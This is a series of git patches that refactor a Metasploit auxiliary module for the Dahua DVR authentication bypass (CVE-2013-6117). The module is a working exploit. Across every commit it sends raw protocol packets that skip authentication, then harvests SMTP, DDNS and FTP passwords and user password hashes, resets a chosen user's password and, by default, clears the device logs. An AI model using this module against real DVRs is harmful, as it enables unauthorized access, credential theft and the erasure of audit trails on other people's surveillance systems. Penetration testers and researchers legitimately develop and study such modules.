"\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ @@ -69,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary def grab_version connect sock.put(VERSION) - data = sock.get(1024) + data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ ver = Regexp.last_match[1] print_status("Version: #{ver} @ #{rhost}:#{rport}!") @@ -78,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary def grab_sn sock.put(SN) - data = sock.get(1024) + data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ serial = Regexp.last_match[1] print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") @@ -88,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary def grab_email connect sock.put(EMAIL) - if data = sock.get(1024).split('&&') + if data = sock.get_once.split('&&') print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ if mailhost = Regexp.last_match[1].split(':') @@ -113,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary def grab_ddns connect sock.put(DDNS) - if data = sock.get(1024) + if data = sock.get_once data = data.split(/&&[0-1]&&/) data.each_with_index do |val, index| if index > 0 @@ -142,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary def grab_nas connect sock.put(NAS) - if data = sock.get(1024) + if data = sock.get_once print_status("Nas Settings @ #{rhost}:#{rport}!:") server = '' port = '' @@ -152,9 +161,7 @@ class Metasploit3 < Msf::Auxiliary print_status(" Nas Server #{server}") print_status(" Nas Port: #{port}") end - if data =~ /[\x00]{16,}([[:print:]]+)[\x00]{16,}([[:print:]]+)/ - ftpuser = Regexp.last_match[1] - ftppass = Regexp.last_match[2] + if data =~ /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ print_good(" FTP User: #{ftpuser}") print_good(" FTP Password: #{ftppass}") if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 @@ -173,7 +180,7 @@ class Metasploit3 < Msf::Auxiliary def grab_channels connect sock.put(CHANNELS) - data = sock.get(1024).split('&&') + data = sock.get_once.split('&&') disconnect if data.length > 1 print_status("Camera Channels @ #{rhost}:#{rport}!:") @@ -185,7 +192,7 @@ class Metasploit3 < Msf::Auxiliary usercount = 0 connect sock.put(USERS) - if data = sock.get(1024).split('&&') + if data = sock.get_once.split('&&') print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 @@ -214,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary def grab_groups connect sock.put(GROUPS) - if data = sock.get(1024).split('&&') + if data = sock.get_once.split('&&') print_status("User Groups: @ #{rhost}:#{rport}!") data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end @@ -231,9 +238,9 @@ class Metasploit3 < Msf::Auxiliary sock.put(u1) sock.put(u2) sock.put(u3) - data = sock.get(1024) + data = sock.get_once sock.put(u1) - if data = sock.get(1024) + if data = sock.get_once print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") end end From 3d617efa88a4cb74531664d263ccbc1f0797303b Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Thu, 3 Dec 2015 15:36:08 -0500 Subject: [PATCH 025/686] added code to parse mailport from config --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index e7a4263db9..a8d6d2ad37 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -101,6 +101,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ if mailhost = Regexp.last_match[1].split(':') + print_status(" Server Port: #{mailhost[1]}") print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end @@ -110,9 +111,10 @@ class Metasploit3 < Msf::Auxiliary muser = "#{data[5]}" mpass = "#{data[6]}" mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" print_good("MailServer: #{mailserver}") if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, rport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? + report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? end end end @@ -356,10 +358,10 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(login_data) end - def report_email_cred(mailserver, rport, muser, mpass) + def report_email_cred(mailserver, mailport, muser, mpass) service_data = { address: mailserver, - port: rport, + port: mailport, service_name: 'email settings', protocol: 'tcp', workspace_id: myworkspace_id From 9d71ff6b9df43e6b7b5a8a257ecc8a683f1b48a1 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Thu, 3 Dec 2015 15:51:49 -0500 Subject: [PATCH 026/686] cleaned up a few misc prints and added in logic if mailport is empty --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index a8d6d2ad37..7bf72be05a 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -101,8 +101,8 @@ class Metasploit3 < Msf::Auxiliary print_status("Email Settings: @ #{rhost}:#{rport}!") if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ if mailhost = Regexp.last_match[1].split(':') - print_status(" Server Port: #{mailhost[1]}") print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end if !data[5].nil? && !data[6].nil? @@ -112,9 +112,8 @@ class Metasploit3 < Msf::Auxiliary mpass = "#{data[6]}" mailserver = "#{mailhost[0]}" mailport = "#{mailhost[1]}" - print_good("MailServer: #{mailserver}") - if !mailserver.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !muser.nil? && !mpass.nil? + if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? end end end @@ -136,12 +135,12 @@ class Metasploit3 < Msf::Auxiliary ddns_user = "#{val[4]}" ddns_pass = "#{val[5]}" print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") unless val.nil? - print_status(" DDNS Server: #{ddns_server}") unless val.nil? - print_status(" DDNS Port: #{ddns_port}") unless val.nil? - print_status(" Domain: #{ddns_domain}") unless val.nil? - print_good(" Username: #{ddns_user}") unless val.nil? - print_good(" Password: #{ddns_pass}") unless val.nil? + print_status(" DDNS Service: #{ddns_service}") + print_status(" DDNS Server: #{ddns_server}") + print_status(" DDNS Port: #{ddns_port}") + print_status(" Domain: #{ddns_domain}") + print_good(" Username: #{ddns_user}") + print_good(" Password: #{ddns_pass}") if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end From 753eddbbd66c0c8eb45d9cb23841f5b20d8a0545 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 14:53:27 -0800 Subject: [PATCH 027/686] Correct true/false for optional options, default values --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 23 ++++++++++--------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 7bf72be05a..a7433984c9 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -17,20 +17,21 @@ class Metasploit3 < Msf::Auxiliary ], 'License' => MSF_LICENSE ) + deregister_options('RHOST') register_options([ - OptString.new('USERNAME', [true, 'A username to reset', '888888']), + OptString.new('USERNAME', [false, 'A username to reset', '888888']), OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), - OptBool.new('VERSION_INFO', ['false', 'Grabs the version of DVR', 'FALSE']), - OptBool.new('EMAIL_INFO', ['false', 'Grabs the email settings of the DVR', 'FALSE']), - OptBool.new('DDNS_INFO', ['false', 'Grabs the DDNS settings of the DVR', 'FALSE']), - OptBool.new('SN_INFO', ['false', 'Grabs the SN of the DVR', 'FALSE']), - OptBool.new('CHANNEL_INFO', ['false', 'Grabs the cameras and their assigned name', 'FALSE']), - OptBool.new('NAS_INFO', ['false', 'Grabs the NAS settings of the DVR', 'FALSE']), - OptBool.new('USER_INFO', ['true', 'Grabs the Users and hashes of the DVR', 'TRUE']), - OptBool.new('GROUP_INFO', ['false', 'Grabs the Users and groups of the DVR', 'FALSE']), - OptBool.new('RESET', [false, %q(Reset an existing user's pw?), 'FALSE']), - OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), 'TRUE']), + OptBool.new('VERSION_INFO', [true, 'Grabs the version of DVR', false]), + OptBool.new('EMAIL_INFO', [true, 'Grabs the email settings of the DVR', false]), + OptBool.new('DDNS_INFO', [true, 'Grabs the DDNS settings of the DVR', false]), + OptBool.new('SN_INFO', [true, 'Grabs the SN of the DVR', false]), + OptBool.new('CHANNEL_INFO', [true, 'Grabs the cameras and their assigned name', false]), + OptBool.new('NAS_INFO', [true, 'Grabs the NAS settings of the DVR', false]), + OptBool.new('USER_INFO', [true, 'Grabs the Users and hashes of the DVR', true]), + OptBool.new('GROUP_INFO', [true, 'Grabs the Users and groups of the DVR', false]), + OptBool.new('RESET', [true, %q(Reset an existing user's pw?), false]), + OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]), Opt::RPORT(37777) ]) end From 93cd3446dbe512ffdb4a61125853fd7ec3c5afe5 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:01:27 -0800 Subject: [PATCH 028/686] Minor cleanup of some print_ lines --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index a7433984c9..dd5ef43df5 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Auxiliary data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ ver = Regexp.last_match[1] - print_status("Version: #{ver} @ #{rhost}:#{rport}!") + print_good("#{peer} -- version: #{ver}") end end @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ serial = Regexp.last_match[1] - print_status("Serial Number: #{serial} @ #{rhost}:#{rport}!") + print_good("#{peer} -- serial number: #{serial}") end end @@ -185,7 +185,7 @@ class Metasploit3 < Msf::Auxiliary data = sock.get_once.split('&&') disconnect if data.length > 1 - print_status("Camera Channels @ #{rhost}:#{rport}!:") + print_good("#{peer} -- camera channels:") data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } end end @@ -224,7 +224,7 @@ class Metasploit3 < Msf::Auxiliary connect sock.put(GROUPS) if data = sock.get_once.split('&&') - print_status("User Groups: @ #{rhost}:#{rport}!") + print_good("#{peer} -- groups:") data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end end @@ -243,14 +243,18 @@ class Metasploit3 < Msf::Auxiliary data = sock.get_once sock.put(u1) if data = sock.get_once - print_good("PASSWORD RESET!: user #{datastore['USERNAME']}'s password reset to #{datastore['PASSWORD']}! @ #{rhost}:#{rport}!") + print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") end end def clear_logs sock.put(CLEAR_LOGS1) sock.put(CLEAR_LOGS2) - print_good("LOGS CLEARED! @ #{rhost}:#{rport}") + print_good("#{peer} -- logs cleared") + end + + def peer + "#{rhost}:#{rport}" end def run_host(ip) @@ -262,9 +266,9 @@ class Metasploit3 < Msf::Auxiliary data = sock.recv(8) disconnect if data == DVR_RESP - print_good("DVR FOUND: @ #{rhost}:#{rport}!") + print_good("#{peer} -- Dahua-based DVR found") report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") - # needs boolean logic to run or not run + if datastore['VERSION_INFO'] grab_version end From 504f6874f2b9247cae6b0700ad972aa906ea1868 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:15:48 -0800 Subject: [PATCH 029/686] Convert to actions --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 97 ++++++++----------- 1 file changed, 42 insertions(+), 55 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index dd5ef43df5..d5a00be79e 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -15,22 +15,26 @@ class Metasploit3 < Msf::Auxiliary [ 'CVE', '2013-6117' ], [ 'URL', 'https://depthsecurity.com/blog/dahua-dvr-authentication-bypass-cve-2013-6117' ] ], - 'License' => MSF_LICENSE - ) + 'License' => MSF_LICENSE, + 'DefaultAction' => 'VERSION', + 'Actions' => + [ + [ 'CHANNEL', { 'Description' => 'Obtain the channel/camera information from the DVR' } ], + [ 'DDNS', { 'Description' => 'Obtain the DDNS settings from the DVR' } ], + [ 'EMAIL', { 'Description' => 'Obtain the email settings from the DVR' } ], + [ 'GROUP', { 'Description' => 'Obtain the group information the DVR' } ], + [ 'NAS', { 'Description' => 'Obtain the NAS settings from the DVR' } ], + [ 'RESET', { 'Description' => 'Reset an existing user\'s password on the DVR' } ], + [ 'SERIAL', { 'Description' => 'Obtain the serial number from the DVR' } ], + [ 'USER', { 'Description' => 'Obtain the user information from the DVR' } ], + [ 'VERSION', { 'Description' => 'Obtain the version of the DVR' } ] + ] + ) deregister_options('RHOST') register_options([ OptString.new('USERNAME', [false, 'A username to reset', '888888']), OptString.new('PASSWORD', [false, 'A password to reset the user with, if not set a random pass will be generated.']), - OptBool.new('VERSION_INFO', [true, 'Grabs the version of DVR', false]), - OptBool.new('EMAIL_INFO', [true, 'Grabs the email settings of the DVR', false]), - OptBool.new('DDNS_INFO', [true, 'Grabs the DDNS settings of the DVR', false]), - OptBool.new('SN_INFO', [true, 'Grabs the SN of the DVR', false]), - OptBool.new('CHANNEL_INFO', [true, 'Grabs the cameras and their assigned name', false]), - OptBool.new('NAS_INFO', [true, 'Grabs the NAS settings of the DVR', false]), - OptBool.new('USER_INFO', [true, 'Grabs the Users and hashes of the DVR', true]), - OptBool.new('GROUP_INFO', [true, 'Grabs the Users and groups of the DVR', false]), - OptBool.new('RESET', [true, %q(Reset an existing user's pw?), false]), OptBool.new('CLEAR_LOGS', [true, %q(Clear the DVR logs when we're done?), true]), Opt::RPORT(37777) ]) @@ -86,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary end end - def grab_sn + def grab_serial sock.put(SN) data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ @@ -258,55 +262,38 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - # user8pwhash = "4WzwxXxM" #888888 - # user6pwhash = "sh15yfFM" #666666 - # useradminpwhash = "6QNMIQGe" #admin - connect - sock.put(U1) - data = sock.recv(8) - disconnect - if data == DVR_RESP + begin + connect + sock.put(U1) + data = sock.recv(8) + disconnect + return unless data == DVR_RESP print_good("#{peer} -- Dahua-based DVR found") report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") - if datastore['VERSION_INFO'] + case action.name.upcase + when 'CHANNEL' + grab_channels + when 'DDNS' + grab_ddns + when 'EMAIL' + grab_email + when 'GROUP' + grab_groups + when 'NAS' + grab_nas + when 'RESET' + reset_user + when 'SERIAL' + grab_serial + when 'USER' + grab_users + when 'VERSION' grab_version end - # needs boolean logic to run or not run - if datastore['SN_INFO'] - grab_sn - end - # needs boolean logic to run or not run - if datastore['EMAIL_INFO'] - grab_email - end - # needs boolean logic to run or not run - if datastore['DDNS_INFO'] - grab_ddns - end - # needs boolean logic to run or not run - if datastore['NAS_INFO'] - grab_nas - end - # needs boolean logic to run or not run - if datastore['CHANNEL_INFO'] - grab_channels - end - # needs boolean logic to run or not run - if datastore['USER_INFO'] - grab_users - end - # needs boolean logic to run or not run - if datastore['GROUP_INFO'] - grab_groups - end - if datastore['RESET'] - reset_user - end - if datastore['CLEAR_LOGS'] - clear_logs - end + clear_logs if datastore['CLEAR_LOGS'] + ensure disconnect end end From 98096ab71c2356e0723b5f3408c8ce4277f2cdc1 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:16:54 -0800 Subject: [PATCH 030/686] Remove useless assignment --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index d5a00be79e..458e8bd8cc 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -244,9 +244,9 @@ class Metasploit3 < Msf::Auxiliary sock.put(u1) sock.put(u2) sock.put(u3) - data = sock.get_once + sock.get_once sock.put(u1) - if data = sock.get_once + if sock.get_once print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") end end From 6c319469959f32ad4c542874de38e665db85622b Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:19:35 -0800 Subject: [PATCH 031/686] Slightly simplify regex --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 458e8bd8cc..27d81debad 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary sock.put(EMAIL) if data = sock.get_once.split('&&') print_status("Email Settings: @ #{rhost}:#{rport}!") - if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?(?:\.[0-9A-Za-z](?:(?:[0-9A-Za-z]|-){0,61}[0-9A-Za-z])?)*\.?+:\d+)/ + if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i if mailhost = Regexp.last_match[1].split(':') print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? @@ -202,7 +202,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Za-z]+)[:]([0-9A-Za-z]+))/]}" + pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}" value = pass.split(":") user = "#{value[1]}" md5hash = "#{value[2]}" From 7346c528cd35608fd46d6f83b50815c373b7acdf Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:21:06 -0800 Subject: [PATCH 032/686] Fix indentation --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 27d81debad..bc08d2989c 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -110,17 +110,17 @@ class Metasploit3 < Msf::Auxiliary print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end - if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? - muser = "#{data[5]}" - mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - mailport = "#{mailhost[1]}" - if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? - end + if !data[5].nil? && !data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" + if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? end + end end end end From 4b30a56f1577dcdd0cfbd8006338c7e953d838ad Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:22:27 -0800 Subject: [PATCH 033/686] Add a few missing connects --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index bc08d2989c..b276bdcad8 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -91,6 +91,7 @@ class Metasploit3 < Msf::Auxiliary end def grab_serial + connect sock.put(SN) data = sock.get_once if data =~ /[\x00]{8,}([[:print:]]+)/ @@ -195,10 +196,10 @@ class Metasploit3 < Msf::Auxiliary end def grab_users - usercount = 0 connect sock.put(USERS) if data = sock.get_once.split('&&') + usercount = 0 print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") data.each do |val| usercount += 1 @@ -234,6 +235,7 @@ class Metasploit3 < Msf::Auxiliary end def reset_user + connect userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" @@ -252,6 +254,7 @@ class Metasploit3 < Msf::Auxiliary end def clear_logs + connect sock.put(CLEAR_LOGS1) sock.put(CLEAR_LOGS2) print_good("#{peer} -- logs cleared") From 72f7efd042e5c9222989a4ef3e271938eb349548 Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Thu, 3 Dec 2015 15:39:27 -0800 Subject: [PATCH 034/686] Lots of style cleanup --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 176 +++++++++--------- 1 file changed, 87 insertions(+), 89 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index b276bdcad8..3baebc1b47 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -103,25 +103,24 @@ class Metasploit3 < Msf::Auxiliary def grab_email connect sock.put(EMAIL) - if data = sock.get_once.split('&&') - print_status("Email Settings: @ #{rhost}:#{rport}!") - if data[0] =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i - if mailhost = Regexp.last_match[1].split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? - end - if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? - muser = "#{data[5]}" - mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - mailport = "#{mailhost[1]}" - if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? - end - end + return unless (response = sock.get_once) + data = response.split('&&') + return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i + print_status("Email Settings: @ #{rhost}:#{rport}!") + if mailhost = Regexp.last_match[1].split(':') + print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? + print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? + print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + end + if !data[5].nil? && !data[6].nil? + print_good(" SMTP User: #{data[5]}") unless data[5].nil? + print_good(" SMTP Password: #{data[6]}") unless data[6].nil? + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" + if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 + report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? end end end @@ -129,28 +128,26 @@ class Metasploit3 < Msf::Auxiliary def grab_ddns connect sock.put(DDNS) - if data = sock.get_once - data = data.split(/&&[0-1]&&/) - data.each_with_index do |val, index| - if index > 0 - val = val.split("&&") - ddns_service = "#{val[0]}" - ddns_server = "#{val[1]}" - ddns_port = "#{val[2]}" - ddns_domain = "#{val[3]}" - ddns_user = "#{val[4]}" - ddns_pass = "#{val[5]}" - print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") - print_status(" DDNS Server: #{ddns_server}") - print_status(" DDNS Port: #{ddns_port}") - print_status(" Domain: #{ddns_domain}") - print_good(" Username: #{ddns_user}") - print_good(" Password: #{ddns_pass}") - if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 - report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) - end - end + return unless (response = sock.get_once) + data = response.split(/&&[0-1]&&/) + data.each_with_index do |val, index| + next if index == 0 + val = val.split("&&") + ddns_service = "#{val[0]}" + ddns_server = "#{val[1]}" + ddns_port = "#{val[2]}" + ddns_domain = "#{val[3]}" + ddns_user = "#{val[4]}" + ddns_pass = "#{val[5]}" + print_status("DDNS Settings @ #{rhost}:#{rport}!:") + print_status(" DDNS Service: #{ddns_service}") + print_status(" DDNS Server: #{ddns_server}") + print_status(" DDNS Port: #{ddns_port}") + print_status(" Domain: 